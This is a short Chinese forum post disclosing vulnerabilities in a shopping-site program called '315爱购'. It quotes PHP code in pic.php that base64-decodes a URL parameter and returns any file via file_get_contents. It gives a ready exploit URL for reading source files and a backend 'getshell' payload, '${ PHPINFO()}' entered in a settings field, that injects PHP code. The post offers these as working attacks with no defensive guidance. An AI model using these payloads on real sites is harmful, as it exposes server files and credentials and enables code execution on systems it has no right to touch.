315爱购程序任意文件源码查看

2012-07-08 03:09:20 14 3245


pic.php
function url_base64_decode($code)
{
        if($code=="")
                return "";
    $code=str_replace("!",'+',$code);
    $code=str_replace(",",'/',$code);
    $str=base64_decode($code);
    return $str;
}
$url=url_base64_decode($_GET["url"]);
//....省略
header("Content-type: image/jpeg");
echo file_get_contents($url);
exp:http://site/pic.php?url=aW5kZXgucGhw
后台GETSHELL
系统基本参数->网站所在目录:->${ PHPINFO()}

关于作者

kiss70篇文章750篇回复

评论14次

要评论?请先  登录  或  注册